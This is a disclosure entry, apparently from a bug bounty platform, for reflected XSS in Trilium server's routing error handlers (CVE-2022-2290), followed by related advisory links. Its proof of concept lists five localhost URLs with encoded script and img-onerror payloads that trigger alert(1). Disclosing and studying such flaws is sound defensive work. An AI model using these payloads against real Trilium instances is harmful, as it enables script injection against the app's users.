Lucene search
Vovikhangcdv367C5C8D-AD6F-46BE-8503-06648ECF09CFHistoryJun 28, 2022 - 7:01 a.m.
Multiple Reflected XSS Vulnerabilities in error handlers
2022-06-2807:01:04
vovikhangcdv
www.huntr.dev
24
reflected xss
error handlers
trilium server
bug bounty
EPSS
0.001
Percentile
41.5%
Description
Multiple routing error handlers are vulnerable to reflected XSS.
Proof of Concept
Deploy trilium server and access to these endpoint will execute the alert js function.
http://localhost:8080/custom/%3Cscript%3Ealert(1)%3C/script%3E
http://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E
http://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E/download
http://localhost:8080/share/api/images/%3Cimg%20src=x%20onerror=alert(1)%3E/filename
http://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E/view
Related
cve
cve
CVE-2022-2290
2022-07-03 06:15:07
prion
prion
Cross site scripting
2022-07-03 06:15:00
osv
osv
CVE-2022-2290
2022-07-03 06:15:07
cvelist
cvelist
CVE-2022-2290 Cross-site Scripting (XSS) - Reflected in zadam/trilium
2022-07-03 06:05:13
nvd
nvd
CVE-2022-2290
2022-07-03 06:15:07
nuclei
nuclei
Trilium <0.52.4 - Cross-Site Scripting
2022-07-05 19:53:31